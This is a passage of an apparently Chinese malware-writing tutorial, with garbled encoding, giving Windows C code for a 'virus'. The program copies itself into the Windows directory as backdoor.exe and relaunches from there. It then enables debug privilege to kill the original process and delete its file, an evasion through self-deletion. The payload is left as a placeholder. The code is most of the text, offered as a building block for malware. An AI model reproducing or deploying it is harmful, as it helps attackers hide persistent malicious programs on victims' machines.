//? 調(diào)整權(quán)限

VOID DebugPrivilege()

{

??? HANDLE hToken = NULL;

???

??? BOOL bRet =OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken);

???

??? if ( bRet == TRUE )

??? {

??????? TOKEN_PRIVILEGES tp;

??????? tp.PrivilegeCount = 1;

???????LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);

??????? tp.Privileges[0].Attributes= SE_PRIVILEGE_ENABLED;

???????AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);

???????

??????? CloseHandle(hToken);

??? }

}

?

//? 獲得某進(jìn)程的 PID

DWORD GetProcessId(char *szProcessName)

{

??? DWORD dwPid = 0;

??? BOOL bRet = 0;

??? PROCESSENTRY32 pe32 = { 0};

??? pe32.dwSize =sizeof(PROCESSENTRY32);

?

??? HANDLE hSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

??? bRet = Process32First(hSnap,&pe32);

?

??? while ( bRet )

??? {

??????? if (strcmp(pe32.szExeFile, szProcessName) == 0 )

??????? {

??????????? break;

??????? }

??????? bRet =Process32Next(hSnap, &pe32);

??? }

?

??? dwPid =pe32.th32ProcessID;

??? return dwPid;

}

?

//? 結(jié)束某進(jìn)程

VOID CloseProcess(DWORD dwPid)

{

??? HANDLE hProcess =OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);

??? TerminateProcess(hProcess,0);

??? CloseHandle(hProcess);

}

?

這幾個(gè)函數(shù)完成后，我們就來根據(jù)病毒的流程來完成病毒的主體代碼，代碼如下：

int main(int argc, char **argv)

{

??? // Windows 目錄

??? char szWinDir[MAX_PATH] ={ 0 };

??? //? 當(dāng)前目錄

??? char szCurrDir[MAX_PATH] ={ 0 };

?

???GetWindowsDirectory(szWinDir, MAX_PATH);

??? GetModuleFileName(NULL,szCurrDir, MAX_PATH);

?

??? //? 獲取當(dāng)前的目錄

??? int ch = '\\';

??? char *pFileName =strrchr(szCurrDir, ch);

??? int nLen =strlen(szCurrDir) - strlen(pFileName);

??? szCurrDir[nLen] = NULL;

?

??? if ( strcmp(szWinDir,szCurrDir) == 0 )

??? {

??????? //? 相同目錄

??????? //? 判斷參數(shù)個(gè)數(shù)

??????? //? 根據(jù)參數(shù)個(gè)數(shù)判斷是否需要?jiǎng)h除原病毒文件

??????? //? 如果病毒是開機(jī)自動(dòng)啟動(dòng)的話，不會(huì)帶有參數(shù)

??????? printf("argc = %d\r\n", argc);

??????? if ( argc == 2 )

??????? {

??????????? ch = '\\';

??????????? pFileName =strrchr(argv[1], ch);

??????????? pFileName ++;

???????????printf("pFileName = %s \r\n", pFileName);

??????????? DWORD dwPid =GetProcessId(pFileName);

??????????? printf("dwPid= %d \r\n", dwPid);

??????????? DebugPrivilege();

???????????CloseProcess(dwPid);

??????????? pFileName =argv[1];

???????????printf("pFileName = %s \r\n", pFileName);

??????????? Sleep(3000);

???????????DeleteFile(pFileName);

??????? }

??????? else

??????? {

??????????? //? 病毒的功能代碼

??????? }

??? }

??? else

??? {

??????? //? 不同目錄，說明是第一次運(yùn)行

?

??????? //? 復(fù)制自身到 windows 目錄里下

??????? strcat(szWinDir,"\\backdoor.exe");

???????GetModuleFileName(NULL, szCurrDir, MAX_PATH);

??????? CopyFile(szCurrDir,szWinDir, FALSE);

?

??????? //? 構(gòu)造要運(yùn)行 windows 目錄下的病毒

??????? //? 以及要傳遞的自身位置

??????? strcat(szWinDir," \"");

??????? strcat(szWinDir,szCurrDir);

??????? strcat(szWinDir,"\"");

??????? printf("%s\r\n", szWinDir);

??????? WinExec(szWinDir, SW_SHOW);

??????? Sleep(1000);

??? }

?

??? // getch() 模擬病毒的動(dòng)作

??? //? 保持病毒進(jìn)程不退出

??? getch();

??? return 0;

}

另類病毒的自刪除方法